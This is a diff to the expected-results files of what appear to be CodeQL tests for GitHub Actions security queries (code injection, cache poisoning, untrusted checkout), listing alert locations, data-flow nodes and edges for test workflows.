@@ -249,6 +249,8 @@ nodes | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -348,6 +350,8 @@ subpaths | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:12:21:12:64 | toJSON(github.event.comment.body).foo | ${{ toJSON(github.event.comment.body).foo }} | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | .github/workflows/test7.yml:9:9:13:6 | Uses Step: comment-branch | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | ${{ steps.comment-branch.outputs.head_ref }} | | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | ${{ steps.refs.outputs.head_ref }} | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index d919880e726..35887c3b370 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected @@ -249,6 +249,8 @@ nodes | .github/workflows/test7.yml:13:9:17:6 | Uses Step: refs | semmle.label | Uses Step: refs | | .github/workflows/test7.yml:18:37:18:80 | steps.comment-branch.outputs.head_ref | semmle.label | steps.comment-branch.outputs.head_ref | | .github/workflows/test7.yml:20:37:20:70 | steps.refs.outputs.head_ref | semmle.label | steps.refs.outputs.head_ref | +| .github/workflows/test8.yml:24:76:24:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | +| .github/workflows/test8.yml:30:76:30:116 | github.event.pull_request.head.ref | semmle.label | github.event.pull_request.head.ref | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step5.outputs.MSG5 | semmle.label | steps.step5.outputs.MSG5 | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index d434bd63c51..6a91d49c0ca 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
@@ -1,12 +1,122 @@ -| .github/workflows/test1.yml:13:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test2.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Uses Step | -| .github/workflows/test3.yml:11:9:14:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Uses Step | -| .github/workflows/test6.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Uses Step | -| .github/workflows/test7.yml:10:9:13:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Uses Step | -| .github/workflows/test8.yml:12:9:15:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:15:9:17:2 | Run Step | Run Step | -| .github/workflows/test8.yml:23:9:26:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Uses Step | -| .github/workflows/test8.yml:34:9:37:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test8.yml:37:9:37:75 | Run Step | Run Step | -| .github/workflows/test11.yml:14:9:19:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test11.yml:19:9:23:6 | Uses Step | Uses Step | -| .github/workflows/test15.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. 
| .github/workflows/test15.yml:17:9:21:6 | Uses Step | Uses Step | -| .github/workflows/test16.yml:14:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Uses Step | -| .github/workflows/test17.yml:15:9:20:6 | Uses Step | Potential cache poisoning in the context of the default branch on step $@. | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Uses Step | +edges +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:13:9:18:6 | Uses Step | +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:18:9:22:6 | Uses Step | +| .github/workflows/test1.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | +| .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:22:9:23:21 | Run Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | +| .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:18:9:19:21 | Run Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | +| .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:22:9:23:34 | Run Step | +| .github/workflows/test4.yml:13:9:16:6 | Uses Step | .github/workflows/test4.yml:16:9:20:6 | Uses Step | +| .github/workflows/test4.yml:13:9:16:6 | Uses Step | 
.github/workflows/test4.yml:20:9:21:34 | Run Step | +| .github/workflows/test4.yml:16:9:20:6 | Uses Step | .github/workflows/test4.yml:20:9:21:34 | Run Step | +| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:14:9:18:6 | Uses Step | +| .github/workflows/test5.yml:11:9:14:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | +| .github/workflows/test5.yml:14:9:18:6 | Uses Step | .github/workflows/test5.yml:18:9:19:11 | Run Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | +| .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:17:9:18:11 | Run Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | +| .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:17:11 | Run Step | +| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:12:9:15:6 | Uses Step | +| .github/workflows/test8.yml:10:9:12:6 | Uses Step: comment-branch | .github/workflows/test8.yml:15:9:17:2 | Run Step | +| .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | +| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:23:9:26:6 | Uses Step | +| .github/workflows/test8.yml:21:9:23:6 | Uses Step: comment-branch | .github/workflows/test8.yml:26:9:28:2 | Uses Step | +| .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | +| .github/workflows/test8.yml:32:9:34:6 | Uses Step: comment-branch | .github/workflows/test8.yml:34:9:37:6 | Uses Step | +| .github/workflows/test8.yml:32:9:34:6 | Uses 
Step: comment-branch | .github/workflows/test8.yml:37:9:37:75 | Run Step | +| .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:14:9:19:6 | Uses Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:19:9:23:6 | Uses Step | +| .github/workflows/test11.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:19:9:23:6 | Uses Step | +| .github/workflows/test11.yml:14:9:19:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:23:9:24:21 | Run Step | +| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:14:9:19:6 | Uses Step | +| .github/workflows/test12.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/test12.yml:19:9:20:30 | Run Step | +| .github/workflows/test12.yml:14:9:19:6 | Uses Step | .github/workflows/test12.yml:19:9:20:30 | Run Step | +| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:17:9:21:6 | Uses Step | +| .github/workflows/test13.yml:14:9:17:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | +| .github/workflows/test13.yml:17:9:21:6 | Uses Step | .github/workflows/test13.yml:21:9:22:21 | Run Step | +| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:17:9:21:6 | Uses Step | +| .github/workflows/test14.yml:14:9:17:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | +| .github/workflows/test14.yml:17:9:21:6 | Uses Step | .github/workflows/test14.yml:21:9:22:21 | Run Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses 
Step | +| .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:21:9:22:21 | Run Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | +| .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:21:9:22:21 | Run Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:20:9:22:6 | Uses Step | +| .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | +| .github/workflows/test17.yml:20:9:22:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:19:9:24:6 | Uses Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:15:9:19:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:24:9:27:6 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:19:9:24:6 | Uses Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:27:9:30:6 | Run Step | +| .github/workflows/test18.yml:24:9:27:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| .github/workflows/test18.yml:27:9:30:6 | Run Step | .github/workflows/test18.yml:30:9:31:54 | Run Step | +| 
.github/workflows/test19.yml:15:9:21:6 | Uses Step: modified_files | .github/workflows/test19.yml:21:9:41:49 | Run Step: check | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:25:7:31:4 | Uses Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:31:7:33:4 | Uses Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:25:7:31:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| 
.github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:31:7:33:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:40:7:41:4 | Run Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | +| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:40:7:41:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:43:7:46:39 | Uses Step | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | 
.github/workflows/test20.yml:43:7:46:39 | Uses Step | +#select +| .github/workflows/test1.yml:18:9:22:6 | Uses Step | .github/workflows/test1.yml:13:9:18:6 | Uses Step | .github/workflows/test1.yml:18:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test2.yml:14:9:18:6 | Uses Step | .github/workflows/test2.yml:11:9:14:6 | Uses Step | .github/workflows/test2.yml:14:9:18:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test3.yml:14:9:22:6 | Uses Step | .github/workflows/test3.yml:11:9:14:6 | Uses Step | .github/workflows/test3.yml:14:9:22:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test6.yml:13:9:17:6 | Uses Step | .github/workflows/test6.yml:10:9:13:6 | Uses Step | .github/workflows/test6.yml:13:9:17:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test7.yml:13:9:16:6 | Uses Step | .github/workflows/test7.yml:10:9:13:6 | Uses Step | .github/workflows/test7.yml:13:9:16:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test8.yml:15:9:17:2 | Run Step | .github/workflows/test8.yml:12:9:15:6 | Uses Step | .github/workflows/test8.yml:15:9:17:2 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test8.yml:26:9:28:2 | Uses Step | .github/workflows/test8.yml:23:9:26:6 | Uses Step | .github/workflows/test8.yml:26:9:28:2 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test8.yml:37:9:37:75 | Run Step | .github/workflows/test8.yml:34:9:37:6 | Uses Step | .github/workflows/test8.yml:37:9:37:75 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test11.yml:19:9:23:6 | Uses Step | .github/workflows/test11.yml:14:9:19:6 | Uses Step | 
.github/workflows/test11.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test15.yml:17:9:21:6 | Uses Step | .github/workflows/test15.yml:14:9:17:6 | Uses Step | .github/workflows/test15.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test16.yml:17:9:21:6 | Uses Step | .github/workflows/test16.yml:14:9:17:6 | Uses Step | .github/workflows/test16.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test17.yml:22:9:26:31 | Uses Step | .github/workflows/test17.yml:15:9:20:6 | Uses Step | .github/workflows/test17.yml:22:9:26:31 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:33:7:38:4 | Uses Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:33:7:38:4 | Uses Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:38:7:40:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:38:7:40:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:41:7:42:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:41:7:42:4 | Run Step | Potential cache poisoning in the context of the default branch | +| .github/workflows/test20.yml:42:7:43:4 | Run Step | .github/workflows/test20.yml:18:7:25:4 | Uses Step | .github/workflows/test20.yml:42:7:43:4 | Run Step | Potential cache poisoning in the context of the default branch | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 92d5a0b5ce1..29b311435dd 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
+++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -1,8 +1,265 @@ -| .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:99:9:103:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/level0.yml:125:9:129:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | -| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. 
| +edges +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:14:7:15:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | +| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | +| .github/workflows/artifactpoisoning7.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | +| .github/workflows/artifactpoisoning7.yml:16:9:20:6 | Run Step: artifact | .github/workflows/artifactpoisoning7.yml:20:9:21:52 | Run Step | +| .github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | +| 
.github/workflows/artifactpoisoning11.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning11.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning11.yml:36:9:38:78 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | +| .github/workflows/artifactpoisoning12.yml:13:9:32:6 | Uses Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | +| .github/workflows/artifactpoisoning12.yml:32:9:36:6 | Run Step | .github/workflows/artifactpoisoning12.yml:36:9:38:62 | Run Step | +| .github/workflows/artifactpoisoning21.yml:13:9:18:6 | Uses Step | .github/workflows/artifactpoisoning21.yml:18:9:20:21 | Run Step | +| .github/workflows/artifactpoisoning22.yml:13:9:17:6 | Uses Step | .github/workflows/artifactpoisoning22.yml:17:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning31.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning31.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning31.yml:18:9:19:23 | Run Step | +| .github/workflows/artifactpoisoning32.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning32.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning33.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning33.yml:16:9:18:20 | Run Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | +| .github/workflows/artifactpoisoning34.yml:13:9:16:6 | Run Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning34.yml:16:9:20:6 | Uses Step | .github/workflows/artifactpoisoning34.yml:20:9:22:23 | 
Run Step | +| .github/workflows/artifactpoisoning41.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning41.yml:21:9:22:23 | Run Step | +| .github/workflows/artifactpoisoning42.yml:13:9:21:6 | Run Step | .github/workflows/artifactpoisoning42.yml:21:9:22:19 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning51.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning51.yml:18:9:20:57 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | +| .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | +| .github/workflows/artifactpoisoning52.yml:15:9:18:6 | Run Step | .github/workflows/artifactpoisoning52.yml:18:9:23:40 | Run Step | 